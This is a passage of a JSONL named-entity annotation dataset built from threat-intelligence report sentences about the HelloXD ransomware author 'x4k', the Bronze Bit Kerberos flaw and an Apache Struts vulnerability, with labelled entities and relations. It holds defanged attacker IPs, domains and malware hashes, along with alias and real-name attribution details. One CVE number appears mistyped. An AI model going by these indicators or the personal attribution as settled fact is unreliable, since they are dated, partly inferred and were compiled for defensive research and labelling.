points.","entities":[{"id":45239,"label":"DOMAIN","start_offset":74,"end_offset":83},{"id":45240,"label":"IPV4","start_offset":128,"end_offset":147},{"id":45237,"label":"SOFTWARE","start_offset":9,"end_offset":15},{"id":45238,"label":"DOMAIN","start_offset":57,"end_offset":73}],"relations":[{"id":306,"from_id":45238,"to_id":45240,"type":"related-to"},{"id":307,"from_id":45239,"to_id":45240,"type":"related-to"}],"Comments":[]} -{"id":2059,"text":"That being said, when looking at the HTML source code of the site, we discovered a couple of references to the user observed before – x4kme – and other aliases such as uKn0wn, which was observed in the HelloXD ransomware samples.","entities":[{"id":47152,"label":"identity","start_offset":168,"end_offset":174},{"id":47150,"label":"identity","start_offset":134,"end_offset":139},{"id":47151,"label":"malware","start_offset":202,"end_offset":209}],"relations":[{"id":308,"from_id":47150,"to_id":47152,"type":"duplicate-of"}],"Comments":[]} -{"id":2060,"text":"Figure 17. Snippet of Script in HTML Source Code xn--90a5ai[.]comFrom the list of aliases used by the threat actor","entities":[{"id":47153,"label":"DOMAIN","start_offset":49,"end_offset":65}],"relations":[],"Comments":[]} -{"id":2061,"text":", we were able to observe another GitHub account with the name l4ckyguy, sharing the profile picture, location and URL in the description, with a link to the previously observed account (x4kme), and a name, Ivan Topor, which we believe may be another alias for this threat actor.","entities":[{"id":45241,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":45242,"label":"identity","start_offset":63,"end_offset":71},{"id":45243,"label":"threat-actor","start_offset":187,"end_offset":192},{"id":45244,"label":"identity","start_offset":207,"end_offset":218},{"id":6137,"label":"location","start_offset":111,"end_offset":114},{"id":6138,"label":"location","start_offset":195,"end_offset":198},{"id":6140,"label":"location","start_offset":236,"end_offset":239}],"relations":[{"id":93,"from_id":45243,"to_id":45244,"type":"related-to"},{"id":92,"from_id":45243,"to_id":45242,"type":"related-to"}],"Comments":[]} -{"id":2062,"text":"A further account, l4cky-control, was also discovered.","entities":[{"id":47154,"label":"identity","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} -{"id":2063,"text":"This repository contained a Python script that would decrypt a secondary Python script which reached out to the IP 167[.]86[.]87[.]27 to download and execute another Python script.","entities":[{"id":6141,"label":"IPV4","start_offset":115,"end_offset":133}],"relations":[],"Comments":[]} -{"id":2064,"text":"This particular IP was linked to a Contabo server that x4k had also included within their VirusTotal graph discussed above.","entities":[{"id":45245,"label":"threat-actor","start_offset":55,"end_offset":58},{"id":45247,"label":"identity","start_offset":35,"end_offset":42},{"id":45246,"label":"SOFTWARE","start_offset":90,"end_offset":101}],"relations":[{"id":94,"from_id":45245,"to_id":45247,"type":"uses"}],"Comments":[]} -{"id":2065,"text":" We also found a YouTube account linked to the actor through the initial email tebya@poime[.]li, using another alias, Vanya Topor.","entities":[{"id":47156,"label":"identity","start_offset":118,"end_offset":129},{"id":47155,"label":"EMAIL","start_offset":79,"end_offset":95}],"relations":[],"Comments":[]} -{"id":2066,"text":"It’s worth pointing out that “Vanya” is a diminutive for Ivan.","entities":[{"id":47157,"label":"identity","start_offset":30,"end_offset":35}],"relations":[],"Comments":[]} -{"id":2067,"text":" The YouTube account has no public videos, but we observed this threat actor sharing unlisted links in various hacking forums.","entities":[{"id":45248,"label":"SOFTWARE","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} -{"id":2068,"text":"The content of the videos were tutorials and walkthroughs, where the threat actor showed his methodology of performing certain actions, depending on the video.","entities":[],"relations":[],"Comments":[]} -{"id":2069,"text":"The videos had no sound, but the threat actor would type commentary on a terminal to address something the viewer was observing on screen.","entities":[],"relations":[],"Comments":[]} -{"id":2070,"text":" The videos found gave us insight into x4k operations before moving into ransomware activity specifically.","entities":[{"id":45249,"label":"threat-actor","start_offset":39,"end_offset":43}],"relations":[],"Comments":[]} -{"id":2071,"text":"We learned how this threat actor leverages Cobalt Strike for his operations, including how to set up Beacons as well as how to send files to compromised systems.","entities":[{"id":47158,"label":"tools","start_offset":43,"end_offset":56}],"relations":[],"Comments":[]} -{"id":2072,"text":"In one of the videos, we actually observed the threat actor performing a DNS leak test on his Android phone.","entities":[],"relations":[],"Comments":[]} -{"id":2073,"text":"We also got to observe how the domain фсб[.]com used to look in October 2020 – a blog of sorts titled “Ghost in the Wire.”","entities":[{"id":45250,"label":"DOMAIN","start_offset":38,"end_offset":47},{"id":45251,"label":"TIME","start_offset":64,"end_offset":76}],"relations":[],"Comments":[]} -{"id":2074,"text":"Where the threat actor keeps alluding to his “Ghost” theme, a similar theme was observed in the HelloXD ransomware samples (Figure 19). ","entities":[{"id":6160,"label":"malware","start_offset":46,"end_offset":51},{"id":6161,"label":"malware","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} -{"id":2075,"text":"In another video instance, we observed the threat actor submit a LockBit 2.0 sample on Cuckoo sandbox and compare the results with another presumably LockBit 2.0 sample prior to the one submitted in the video.","entities":[{"id":47159,"label":"malware","start_offset":65,"end_offset":76},{"id":47161,"label":"tools","start_offset":87,"end_offset":101},{"id":47160,"label":"malware","start_offset":150,"end_offset":161}],"relations":[],"Comments":[]} -{"id":2076,"text":"At the time of writing, we don’t believe x4k is related to LockBit 2.0 activity, but we did find the choice of this particular ransomware family interesting (Figure 20).","entities":[{"id":45253,"label":"malware","start_offset":59,"end_offset":70},{"id":45252,"label":"threat-actor","start_offset":41,"end_offset":44}],"relations":[],"Comments":[]} -{"id":2077,"text":"We also noticed this threat actor leveraging the use of other sandboxes besides Cuckoo – such as ANY.RUN and Hybrid Analysis – to test out verdicts and tooling, alongside the use of various virtual machines.","entities":[{"id":47164,"label":"tools","start_offset":80,"end_offset":86},{"id":47162,"label":"SOFTWARE","start_offset":97,"end_offset":104},{"id":47163,"label":"SOFTWARE","start_offset":109,"end_offset":124}],"relations":[],"Comments":[]} -{"id":2078,"text":" Additionally, this threat actor not only leverages open-source tooling, but also develops his own tools and scripts.","entities":[],"relations":[],"Comments":[]} -{"id":2079,"text":"We were able to see this threat actor demonstrating some of his tools performing automated actions in his videos, such as obfuscating files, creating executables and code signing (Figure 21).","entities":[],"relations":[],"Comments":[]} -{"id":2080,"text":" Taking a closer look at x4k’s main OS, we believe it to be a customized Kali Linux instance, tailored to his needs.","entities":[{"id":47207,"label":"threat-actor","start_offset":25,"end_offset":29},{"id":47208,"label":"SOFTWARE","start_offset":73,"end_offset":83}],"relations":[],"Comments":[]} -{"id":2081,"text":"Most of his videos, comments, configurations and tutorials are written in Russian – and when combined with knowledge gained from a few OPSEC mistakes – Russia is also where we believe x4k originates from.","entities":[{"id":47209,"label":"threat-actor","start_offset":184,"end_offset":187},{"id":47210,"label":"location","start_offset":152,"end_offset":158}],"relations":[{"id":310,"from_id":47209,"to_id":47210,"type":"located-at"}],"Comments":[]} -{"id":2082,"text":"Additionally, we encountered the ClamAV logo during one of the threat actor walkthrough videos – the same logo used on the HelloXD ransomware samples (Figure 22).","entities":[{"id":45255,"label":"malware","start_offset":123,"end_offset":130},{"id":45254,"label":"SOFTWARE","start_offset":33,"end_offset":39}],"relations":[],"Comments":[]} -{"id":2083,"text":"This time around, x4k is using the logo as the start menu for his OS enviorment.","entities":[{"id":47211,"label":"threat-actor","start_offset":18,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2084,"text":"On the same taskbar, we also noticed the Telegram icon, which is a very popular messaging app for chatting – but is also used by threat actors such as LAPSUS$ to post news into specific channels.","entities":[{"id":6199,"label":"threat-actor","start_offset":151,"end_offset":158},{"id":47212,"label":"SOFTWARE","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} -{"id":2085,"text":"Using his username and alias and pivot, we were able to identify two Telegram accounts sharing the same picture as observed before, and descriptions pointing to the threat actor’s main site фсб[.]com.","entities":[{"id":47213,"label":"DOMAIN","start_offset":190,"end_offset":199},{"id":47214,"label":"SOFTWARE","start_offset":69,"end_offset":77}],"relations":[],"Comments":[]} -{"id":2086,"text":"We noticed that the x4k Telegram account is used actively versus the old account – which, according to Telegram, hasn’t been active in a while (Figure 23).","entities":[{"id":47215,"label":"threat-actor","start_offset":20,"end_offset":23},{"id":47216,"label":"SOFTWARE","start_offset":24,"end_offset":32},{"id":47217,"label":"SOFTWARE","start_offset":103,"end_offset":111}],"relations":[],"Comments":[]} -{"id":2087,"text":" x4k has a very solid online presence, which has enabled us to uncover much of his activity in these last two years.","entities":[{"id":47219,"label":"TIME","start_offset":101,"end_offset":115},{"id":47218,"label":"threat-actor","start_offset":1,"end_offset":4}],"relations":[],"Comments":[]} -{"id":2088,"text":"This threat actor has done little to hide malicious activity, and is probably going to continue this behavior.","entities":[],"relations":[],"Comments":[]} -{"id":2089,"text":"Unit 42 research encountered HelloXD, a ransomware family in its initial stages – but already intending to impact organizations.","entities":[{"id":6214,"label":"identity","start_offset":0,"end_offset":7},{"id":6215,"label":"malware","start_offset":29,"end_offset":36}],"relations":[],"Comments":[]} -{"id":2090,"text":"While the ransomware functionality is nothing new, during our research, following the lines, we found out the ransomware is most likely developed by a threat actor named x4k.","entities":[{"id":47220,"label":"threat-actor","start_offset":170,"end_offset":173}],"relations":[],"Comments":[]} -{"id":2092,"text":"Unit 42 was able to uncover additional x4k activity being linked to malicious infrastructure, and additional malware besides the initial ransomware sample, going back to 2020.","entities":[{"id":47223,"label":"threat-actor","start_offset":39,"end_offset":42},{"id":47222,"label":"identity","start_offset":0,"end_offset":7},{"id":47224,"label":"TIME","start_offset":170,"end_offset":174}],"relations":[],"Comments":[]} -{"id":2093,"text":" Ransomware is a lucrative operation if done correctly.","entities":[],"relations":[],"Comments":[]} -{"id":2094,"text":"Unit 42 has observed ransom demands and average payments going up in the latest Ransomware Threat Report.","entities":[{"id":47225,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":2095,"text":"Unit 42 believes that x4k, this threat actor, is now expanding into the ransomware business to capitalize on some of the gains other ransomware groups are making.","entities":[{"id":47226,"label":"identity","start_offset":0,"end_offset":7},{"id":47227,"label":"threat-actor","start_offset":22,"end_offset":25}],"relations":[],"Comments":[]} -{"id":2096,"text":" Palo Alto Networks detects and prevents HelloXD and x4k activity in the following ways: If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:","entities":[{"id":47231,"label":"identity","start_offset":181,"end_offset":211},{"id":47228,"label":"identity","start_offset":1,"end_offset":19},{"id":47229,"label":"malware","start_offset":41,"end_offset":48},{"id":47230,"label":"threat-actor","start_offset":53,"end_offset":56}],"relations":[],"Comments":[]} -{"id":2097,"text":"Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":45261,"label":"identity","start_offset":115,"end_offset":136},{"id":45260,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":2098,"text":"CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.","entities":[{"id":47232,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":2099,"text":"Learn more about the Cyber Threat Alliance.","entities":[{"id":47233,"label":"identity","start_offset":21,"end_offset":42}],"relations":[],"Comments":[]} -{"id":2100,"text":" 435781ab608ff908123d9f4758132fa45d459956755d27027a52b8c9e61f9589 ebd310cb5f63b364c4ce3ca24db5d654132b87728babae4dc3fb675266148fe9 65ccbd63fbe96ea8830396c575926af476c06352bb88f9c22f90de7bb85366a3 903c04976fa6e6721c596354f383a4d4272c6730b29eee00b0ec599265963e74 7247f33113710e5d9bd036f4c7ac2d847b0bf2ac2769cd8246a10f09d0a41bab 4e9d4afc901fa1766e48327f3c9642c893831af310bc18ccf876d44ea4efbf1d 709b7e8edb6cc65189739921078b54f0646d38358f9a8993c343b97f3493a4d9 0e1aa5bb7cdccacfa8cbfe1aa71137b361bea04252fff52a9274b32d0e23e3aa 1fafe53644e1bb8fbc9d617dd52cd7d0782381a9392bf7bcab4db77edc20b58b 3477b704f6dceb414dad49bf8d950ef55205ffc50d2945b7f65fb2d5f47e4894 3eb1a41c86b3846d33515536c760e98f5cf0a741c682227065cbafea9d350806 4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b 4de1279596cf5e0b2601f8b719b5240cb00b70c0d6aa0c11e2f32bc3ded020aa 4ea43678c3f84a66ce93cff50b11aabbe28c99c058e7043f275fea3456f55b88 5ae0d9e7ae61f3afb989aaf8e36eda1816ec44ceae666aea87a9fdc6fed35594 667b8abb731656c83f2f53815be68cce5d1ace3cb4ed242c9fecd4a66ac2f816 78ae3726d5b0815ad2e5a775ecf1a6cd36e1eeeee133b0766158a6b107ef7c34 7da83a27e4d788ca33b8b05d365fdf803cb68e0df4d69942ba9b7bde54619322 8a02f01cc3ac71b2c440148fd51b44e260a953e4fc1ee1c3fe787395b8c712ab 963cacd7eeebfb09950668bf1c6adf5452b992fc09119835cd256c5d3cf17f91 a57b1cfd3e801305856cdb75839de05f03439e264ccdbd1497685878a2605b5a bd111240c24a6a188f2664eb15195630b13aa6d9483fc8cfed339dddf803fd4e d8026801e1b78d9bdcb4954c194748d0fdc631594899b29a2746ae425b8bfc79 d8db562070b06d835721413a98f757b88d59277bf638467fda2ee254afc692a0 d97d666239cc973a38dc788bf017f5d8ae19257561888b61ecff8e086c4e3ea0 19d7e899777fbe432b2c90b992604599706b4109c3ceaa7946e8548f4c190a19 1dbf8ae62cc90c837ba12ceee08a1d989732a95bdcef5ca18151ef698ed98a03 22b32bb7c791842a6aa604d08208b13db07ccd1fe81f47ea8369537addb26c7b 26019b86686c1038326f075663d79803e4412bf9952eae65d7b9278be74ac55c 26cccc7e9155bd746e3bb963d40d6edfc001e6d936faf9392202e3788996105a 43fa55c88453db0de0c22f3eb0b11d1db9286f3ee423e82704fdce506d3af516 4564ca0c436fde9e76f5fa65cbcf483adf1fbfa3d7369b7bb67d2c95457f6bc5 585a22e822ade633cee349fd0a9e6a7d083de250fb56189d5a29d3fc5468680c 592b1e55ceef3b8a1ecb28721ebf2e8edd109b9b492cf3c0c0d30831c7432e00 611f3b0ed65dc98a0d7f5c57512212c6ab0a5de5d6bbf7131d3b7ebf360773c6 6b437208dfb4a7906635e16a5cbb8a1719dc49c51e73b7783202ab018181b616 6e8ececfdc74770885f9dc63b4b2316e8c4a011fd9e382c1ba7c4f09f256925d 99f97a47d8d60b8fa65b4ddaf5f43e4352765a91ab053ceb8a3162084df7d099 9e2524b2eaf5248eed6b2d20ae5144fb3bb543647cf612e5ca52135d16389f1a c15111a5f33b3c51a26f814b64c891791ff21104ee75a4773fef86dfc7a8e7ca cd9908f50c9dd97a2ce22ee57ba3e014e204369e5b75b88cefb270dc44a5ca50 ddc96ac931762065fc085be8138c38f2b6b52095a42b34bc415c9572de17386a e9b832fa02235b95a65ad716342d01ae87fcdb686b448e8462d6e86c1f4b3156 f055577220c7dc4be46510b9fed4ecfa78920025d1b2ac5853b5bf7ea136cf37 f7ae6b5ed444abfceda7217b9158895ed28cfdd946bf3e5c729570a5c29d5d82 b843d7498506ddc272e183bbe90cf73cc4779b37341108e002923aa938ca9169 77dec8fc40ff9332eb6d40ded23d606c88d9fa3785a820ea7b1ef0d12a5c4447 f52fb7ba5061ee4144439ff652c0b4f3cf941fe37fbd66e9d7672dd213fbcdb2 beee37fb9cf3e02121b2169399948c1b0830a626d4ed27a617813fa67dd91d58 b4c11c97d23ea830bd13ad4a05a87be5d8cc55ebdf1e1b458fd68bea71d80b54 f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c c619edb3fa8636c50b59a42d0bdc4c71cbd46a0586b683773e9a5e509f688176 50a479f16713d03b95103e0a95a3d575b7263bd16c334258eefa3ae8f46e3d1d 83b5c6d73f3fc893dbd7effa7c50dc9b2455ec053aa9c51d70e13305ecf21fa4 02894fa01c9b82dcfd93e35f49a0d5408f7f4f8a25f33ad17426bb00afa71f63 98ba86c1273b5e8d68ce90ac1745d16335c5e04ec76e8c58448ae6c91136fc4d 5fa5b5dddfe588791b59c945beba1f57a74bd58b53a09d38ac8a8679a0541f16 164[.]68[.]114[.]29 167[.]86[.]87[.]27 63[.]250[.]53[.]180 45[.]15[.]19[.]130 46[.]39[.]229[.]17 www.zxlab.iol4cky[.]men btc-trazer[.]xyz sandbox[.]x4k[.]me malware[.]x4k[.]me f[.]x4k[.]me 0[.]x4k[.]me pwn[.]x4k[.]me docker[.]x4k[.]me apk[.]x4k[.]me x4k[.]me powershell[.]services vmi378732[.]contaboserver[.]net x4k[.]in L4cky[.]men m[.]x4k[.]me mx2[.]l4cky[.]com mailhost[.]l4cky[.]com www1[.]l4cky[.]com authsmtp[.]l4cky[.]com ns[.]l4cky[.]com mailer[.]l4cky[.]com imap2[.]l4cky[.]com ns2[.]l4cky[.]com server[.]l4cky[.]com auth[.]l4cky[.]com remote[.]l4cky[.]com mx10[.]l4cky[.]com ms1[.]l4cky[.]com mx5[.]l4cky[.]com relay2[.]l4cky[.]com ns1[.]l4cky[.]com email[.]l4cky[.]com imap[.]l4cky[.]com mail[.]x4k[.]me repo[.]x4k[.]me bw[.]x4k[.]me collabora[.]x4k[.]me cloud[.]x4k[.]me yacht[.]x4k[.]me book[.]x4k[.]me teleport[.]x4k[.]me subspace[.]x4k[.]me windows[.]x4k[.]me sf[.]x4k[.]me dc-b00e12923fb6.l4cky[.]men box[.]l4cky[.]men mail[.]l4cky[.]men www[.]l4cky[.]men mta-sts[.]l4cky[.]men ldap[.]l4cky[.]men cloud[.]l4cky[.]men office[.]l4cky[.]men rexdooley[.]ml relay2[.]kuimvd[.]ru ns2[.]webmiting[.]ru https:\/\/фсб[.]com 2022 Unit 42 Ransomware Threat Report Highlights Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":45262,"label":"SHA2","start_offset":1,"end_offset":65},{"id":45264,"label":"SHA2","start_offset":131,"end_offset":195},{"id":45265,"label":"SHA2","start_offset":196,"end_offset":260},{"id":45267,"label":"SHA2","start_offset":326,"end_offset":390},{"id":45268,"label":"SHA2","start_offset":391,"end_offset":455},{"id":45271,"label":"SHA2","start_offset":587,"end_offset":651},{"id":45272,"label":"SHA2","start_offset":652,"end_offset":716},{"id":45278,"label":"SHA2","start_offset":1042,"end_offset":1106},{"id":45294,"label":"SHA2","start_offset":2082,"end_offset":2146},{"id":45325,"label":"IPV4","start_offset":3768,"end_offset":3786},{"id":45263,"label":"SHA2","start_offset":66,"end_offset":130},{"id":45284,"label":"SHA2","start_offset":1432,"end_offset":1496},{"id":45285,"label":"SHA2","start_offset":1497,"end_offset":1561},{"id":45286,"label":"SHA2","start_offset":1562,"end_offset":1626},{"id":45324,"label":"IPV4","start_offset":3748,"end_offset":3767},{"id":45280,"label":"SHA2","start_offset":1172,"end_offset":1236},{"id":45292,"label":"SHA2","start_offset":1952,"end_offset":2016},{"id":45293,"label":"SHA2","start_offset":2017,"end_offset":2081},{"id":45295,"label":"SHA2","start_offset":2147,"end_offset":2211},{"id":45299,"label":"SHA2","start_offset":2407,"end_offset":2471},{"id":45303,"label":"SHA2","start_offset":2602,"end_offset":2666},{"id":45266,"label":"SHA2","start_offset":261,"end_offset":325},{"id":45269,"label":"SHA2","start_offset":457,"end_offset":521},{"id":45270,"label":"SHA2","start_offset":522,"end_offset":586},{"id":45275,"label":"SHA2","start_offset":847,"end_offset":911},{"id":45276,"label":"SHA2","start_offset":912,"end_offset":976},{"id":45277,"label":"SHA2","start_offset":977,"end_offset":1041},{"id":45279,"label":"SHA2","start_offset":1107,"end_offset":1171},{"id":45281,"label":"SHA2","start_offset":1237,"end_offset":1301},{"id":45282,"label":"SHA2","start_offset":1302,"end_offset":1366},{"id":45283,"label":"SHA2","start_offset":1367,"end_offset":1431},{"id":45287,"label":"SHA2","start_offset":1627,"end_offset":1691},{"id":45289,"label":"SHA2","start_offset":1757,"end_offset":1821},{"id":45290,"label":"SHA2","start_offset":1822,"end_offset":1886},{"id":45291,"label":"SHA2","start_offset":1887,"end_offset":1951},{"id":45296,"label":"SHA2","start_offset":2212,"end_offset":2276},{"id":45297,"label":"SHA2","start_offset":2277,"end_offset":2341},{"id":45298,"label":"SHA2","start_offset":2342,"end_offset":2406},{"id":45301,"label":"SHA2","start_offset":2472,"end_offset":2536},{"id":45302,"label":"SHA2","start_offset":2537,"end_offset":2601},{"id":45304,"label":"SHA2","start_offset":2667,"end_offset":2731},{"id":45309,"label":"SHA2","start_offset":2927,"end_offset":2991},{"id":45311,"label":"SHA2","start_offset":3057,"end_offset":3121},{"id":45318,"label":"SHA2","start_offset":3512,"end_offset":3576},{"id":45319,"label":"SHA2","start_offset":3577,"end_offset":3641},{"id":45320,"label":"SHA2","start_offset":3642,"end_offset":3706},{"id":45321,"label":"IPV4","start_offset":3708,"end_offset":3727},{"id":45322,"label":"IPV4","start_offset":3729,"end_offset":3747},{"id":45326,"label":"IPV4","start_offset":3787,"end_offset":3805},{"id":45305,"label":"SHA2","start_offset":2732,"end_offset":2796},{"id":45306,"label":"SHA2","start_offset":2797,"end_offset":2861},{"id":45308,"label":"SHA2","start_offset":2862,"end_offset":2926},{"id":45310,"label":"SHA2","start_offset":2992,"end_offset":3056},{"id":45312,"label":"SHA2","start_offset":3122,"end_offset":3186},{"id":45313,"label":"SHA2","start_offset":3187,"end_offset":3251},{"id":45314,"label":"SHA2","start_offset":3252,"end_offset":3316},{"id":45315,"label":"SHA2","start_offset":3317,"end_offset":3381},{"id":45316,"label":"SHA2","start_offset":3382,"end_offset":3446},{"id":45317,"label":"SHA2","start_offset":3447,"end_offset":3511},{"id":45327,"label":"DOMAIN","start_offset":3806,"end_offset":3829},{"id":45328,"label":"DOMAIN","start_offset":3830,"end_offset":3846},{"id":45329,"label":"DOMAIN","start_offset":3847,"end_offset":3865},{"id":45331,"label":"DOMAIN","start_offset":3885,"end_offset":3897},{"id":45335,"label":"DOMAIN","start_offset":3944,"end_offset":3958},{"id":45343,"label":"DOMAIN","start_offset":4056,"end_offset":4073},{"id":45344,"label":"DOMAIN","start_offset":4074,"end_offset":4096},{"id":45345,"label":"DOMAIN","start_offset":4097,"end_offset":4115},{"id":45346,"label":"DOMAIN","start_offset":4116,"end_offset":4138},{"id":45347,"label":"DOMAIN","start_offset":4139,"end_offset":4155},{"id":45348,"label":"DOMAIN","start_offset":4156,"end_offset":4176},{"id":45349,"label":"DOMAIN","start_offset":4177,"end_offset":4196},{"id":45330,"label":"DOMAIN","start_offset":3866,"end_offset":3884},{"id":45332,"label":"DOMAIN","start_offset":3898,"end_offset":3910},{"id":45333,"label":"DOMAIN","start_offset":3911,"end_offset":3925},{"id":45334,"label":"DOMAIN","start_offset":3926,"end_offset":3943},{"id":45337,"label":"DOMAIN","start_offset":3959,"end_offset":3967},{"id":45340,"label":"DOMAIN","start_offset":3990,"end_offset":4030},{"id":45341,"label":"DOMAIN","start_offset":4031,"end_offset":4042},{"id":45342,"label":"DOMAIN","start_offset":4043,"end_offset":4055},{"id":45367,"label":"DOMAIN","start_offset":4476,"end_offset":4492},{"id":45338,"label":"DOMAIN","start_offset":3968,"end_offset":3989},{"id":45363,"label":"DOMAIN","start_offset":4409,"end_offset":4424},{"id":45365,"label":"DOMAIN","start_offset":4441,"end_offset":4454},{"id":45368,"label":"DOMAIN","start_offset":4493,"end_offset":4509},{"id":45369,"label":"DOMAIN","start_offset":4510,"end_offset":4525},{"id":45371,"label":"DOMAIN","start_offset":4526,"end_offset":4545},{"id":45380,"label":"DOMAIN","start_offset":4682,"end_offset":4703},{"id":45382,"label":"DOMAIN","start_offset":4723,"end_offset":4742},{"id":45383,"label":"DOMAIN","start_offset":4743,"end_offset":4763},{"id":45350,"label":"DOMAIN","start_offset":4197,"end_offset":4214},{"id":45351,"label":"DOMAIN","start_offset":4215,"end_offset":4235},{"id":45352,"label":"DOMAIN","start_offset":4236,"end_offset":4254},{"id":45353,"label":"DOMAIN","start_offset":4255,"end_offset":4275},{"id":45354,"label":"DOMAIN","start_offset":4276,"end_offset":4294},{"id":45355,"label":"DOMAIN","start_offset":4295,"end_offset":4312},{"id":45356,"label":"DOMAIN","start_offset":4313,"end_offset":4330},{"id":45357,"label":"DOMAIN","start_offset":4331,"end_offset":4351},{"id":45360,"label":"DOMAIN","start_offset":4370,"end_offset":4389},{"id":45361,"label":"DOMAIN","start_offset":4390,"end_offset":4408},{"id":45366,"label":"DOMAIN","start_offset":4455,"end_offset":4475},{"id":45372,"label":"DOMAIN","start_offset":4546,"end_offset":4565},{"id":45373,"label":"DOMAIN","start_offset":4566,"end_offset":4584},{"id":45375,"label":"DOMAIN","start_offset":4585,"end_offset":4598},{"id":45376,"label":"DOMAIN","start_offset":4599,"end_offset":4626},{"id":45377,"label":"DOMAIN","start_offset":4627,"end_offset":4644},{"id":45378,"label":"DOMAIN","start_offset":4645,"end_offset":4663},{"id":45379,"label":"DOMAIN","start_offset":4664,"end_offset":4681},{"id":45381,"label":"DOMAIN","start_offset":4704,"end_offset":4722},{"id":45384,"label":"DOMAIN","start_offset":4764,"end_offset":4778},{"id":45358,"label":"DOMAIN","start_offset":4352,"end_offset":4369},{"id":45364,"label":"DOMAIN","start_offset":4425,"end_offset":4440},{"id":45385,"label":"DOMAIN","start_offset":4779,"end_offset":4799},{"id":45386,"label":"DOMAIN","start_offset":4800,"end_offset":4820},{"id":45389,"label":"TIME","start_offset":4840,"end_offset":4844},{"id":6255,"label":"SHA2","start_offset":717,"end_offset":781},{"id":6256,"label":"SHA2","start_offset":782,"end_offset":846},{"id":6270,"label":"SHA2","start_offset":1692,"end_offset":1756},{"id":6306,"label":"URL","start_offset":4821,"end_offset":4838},{"id":6308,"label":"identity","start_offset":4845,"end_offset":4852}],"relations":[],"Comments":[]} -{"id":2101,"text":"Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2102,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":2103,"text":"This post is also available in: 日本語 (Japanese) A recent vulnerability in the Kerberos authentication protocol, CVE-2020-17049 (dubbed Bronze Bit), has been disclosed by Microsoft.","entities":[{"id":45392,"label":"identity","start_offset":175,"end_offset":184},{"id":45390,"label":"vulnerability","start_offset":117,"end_offset":131},{"id":45393,"label":"SOFTWARE","start_offset":83,"end_offset":91},{"id":45391,"label":"vulnerability","start_offset":140,"end_offset":150}],"relations":[{"id":95,"from_id":45391,"to_id":45390,"type":"duplicate-of"}],"Comments":[]} -{"id":2104,"text":"The vulnerability is in the way that the Key Distribution Center (KDC) handles service tickets and validates whether delegation is allowed.","entities":[],"relations":[],"Comments":[]} -{"id":2105,"text":" In the attack, as detailed in the Palo Alto Networks Security Operations blog, “Protecting Against the Bronze Bit Vulnerability with Cortex XDR,” the attacker tampers with the Kerberos service ticket, which allows the attacker to authenticate to the target as any user, including sensitive accounts and members of the “Protected Users” group.","entities":[{"id":47238,"label":"vulnerability","start_offset":104,"end_offset":128},{"id":47239,"label":"SOFTWARE","start_offset":134,"end_offset":144},{"id":47240,"label":"SOFTWARE","start_offset":177,"end_offset":185},{"id":47237,"label":"identity","start_offset":35,"end_offset":73}],"relations":[],"Comments":[]} -{"id":2106,"text":" The vulnerability was patched by Microsoft, and the patch will be gradually deployed with upcoming Windows updates.","entities":[{"id":45394,"label":"identity","start_offset":34,"end_offset":43},{"id":45395,"label":"SOFTWARE","start_offset":100,"end_offset":107}],"relations":[],"Comments":[]} -{"id":2107,"text":"Microsoft aims to enforce using the patch only on or after May 11, 2021.","entities":[{"id":47242,"label":"identity","start_offset":0,"end_offset":9},{"id":47243,"label":"TIME","start_offset":59,"end_offset":71}],"relations":[],"Comments":[]} -{"id":2108,"text":" Palo Alto Network customers running Cortex XDR version 7.3 with the latest content update are protected from “Pass-the-Ticket” attacks using the standard Windows API.","entities":[{"id":47244,"label":"identity","start_offset":1,"end_offset":18},{"id":47245,"label":"SOFTWARE","start_offset":37,"end_offset":59},{"id":47246,"label":"attack-pattern","start_offset":110,"end_offset":135},{"id":47247,"label":"SOFTWARE","start_offset":155,"end_offset":166}],"relations":[],"Comments":[]} -{"id":2109,"text":"Customers running Cortex XDR Pro with analytics enabled will get alerted on related suspicious activities and specifically on a delegation from or to a protected user. Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":45397,"label":"identity","start_offset":169,"end_offset":187},{"id":45396,"label":"SOFTWARE","start_offset":18,"end_offset":32}],"relations":[],"Comments":[]} -{"id":2110,"text":"Sign up to receive the latest news, cyber threat intelligence and research from us","entities":[],"relations":[],"Comments":[]} -{"id":2111,"text":" Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2112,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":2113,"text":"Situation Overview","entities":[],"relations":[],"Comments":[]} -{"id":2114,"text":"On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-1176, a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.","entities":[{"id":47248,"label":"TIME","start_offset":3,"end_offset":18},{"id":47249,"label":"vulnerability","start_offset":82,"end_offset":95},{"id":47252,"label":"SOFTWARE","start_offset":145,"end_offset":199},{"id":47250,"label":"vulnerability","start_offset":99,"end_offset":134}],"relations":[{"id":311,"from_id":47252,"to_id":47249,"type":"has"},{"id":312,"from_id":47252,"to_id":47250,"type":"has"}],"Comments":[]} -{"id":2115,"text":"The Apache Foundation has urged everyone to apply the security updates as soon as possible.","entities":[{"id":45398,"label":"identity","start_offset":4,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2116,"text":"This blog is to provide information to help organizations assess their risk of the vulnerability and to inform Palo Alto Networks customers of protections in place that can help mitigate their risk until they can apply the security 